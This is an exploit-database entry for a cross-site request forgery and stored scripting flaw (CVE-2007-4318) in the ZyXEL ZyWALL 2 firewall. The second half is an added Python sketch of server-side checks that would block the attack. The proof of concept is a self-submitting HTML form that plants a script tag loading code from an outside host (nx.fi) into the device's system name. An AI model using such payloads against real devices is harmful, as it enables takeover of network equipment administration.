Exploit ZYXEL ZyWALL 2 3.62 - '/Forms/General_1?sysSystemName' Cross-Site Scripting

Exploiter

18 Dec 2022
EDB-ID: 30485
EDB verification: Passed
Author: HENRI LINDBERG
Vulnerability type: REMOTE
Platform: HARDWARE
CVE: CVE-2007-4318
Publication date: 2007-08-10
HTML:
source: https://www.securityfocus.com/bid/25262/info

ZyXEL ZyWALL 2 is prone to multiple remote vulnerabilities that affect the management interface.

An attacker can exploit these issues to carry out cross-site request forgery, HTML-injection, and denial-of-service attacks.

ZyWALL 2 running with firmware V3.62(WK.6) is reported vulnerable to this issue. 

 <html>
  <body onload="document.CSRF.submit()">
  <FORM name="CSRF" METHOD="POST"
ACTION="http://192.168.1.1/Forms/General_1">
  <INPUT NAME="sysSystemName" VALUE="<script src='http://nx.fi/X'>">
  <INPUT NAME="sysDomainName" VALUE="evil.com">
  <INPUT NAME="StdioTimout" VALUE="0">
  <INPUT NAME="sysSubmit" VALUE="Apply">
  </form>
  </body>
  </html>
 
Source: www.exploit-db.com
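
The form above works because the management interface accepts a cross-site POST without any proof that it came from its own pages, and stores the system name without validating or encoding it. The following is an added example, not part of the original advisory and not ZyXEL code: a Python sketch of the three server-side checks that would reject this request. The `csrf_token` field, the function names, the hostname-style rule for the system name and the sample origin are assumptions made for illustration.

```python
import hmac
import html
import re
from urllib.parse import urlsplit

# Assumption: a system name only needs hostname-label characters (RFC 1123).
_NAME_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?")

# Constructed sample mirroring the fields of the form on this page.
POC_FORM = {
    "sysSystemName": "<script src='http://nx.fi/X'>",
    "sysDomainName": "evil.com",
    "StdioTimout": "0",
    "sysSubmit": "Apply",
}

def same_origin(headers, expected_host):
    """True only if Origin (or, failing that, Referer) names the device itself."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False  # state-changing POST with no origin information
    return urlsplit(src).netloc == expected_host

def check_general_form(headers, form, session_token, expected_host):
    """Return (ok, reason) for a POST to the settings form."""
    if not same_origin(headers, expected_host):
        return False, "cross-origin request"
    # Hypothetical per-session token that a page on another site cannot read.
    sent = form.get("csrf_token", "")
    if not hmac.compare_digest(sent.encode(), session_token.encode()):
        return False, "missing or wrong CSRF token"
    if not _NAME_RE.fullmatch(form.get("sysSystemName", "")):
        return False, "invalid system name"
    return True, "ok"

def render_system_name(name):
    """Encode on output so a stored value is shown as text, never parsed as markup."""
    return html.escape(name, quote=True)
```

Each check fails closed on its own, so a request that slips past one (for example a same-origin page with an injection flaw elsewhere) is still stopped by the next.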
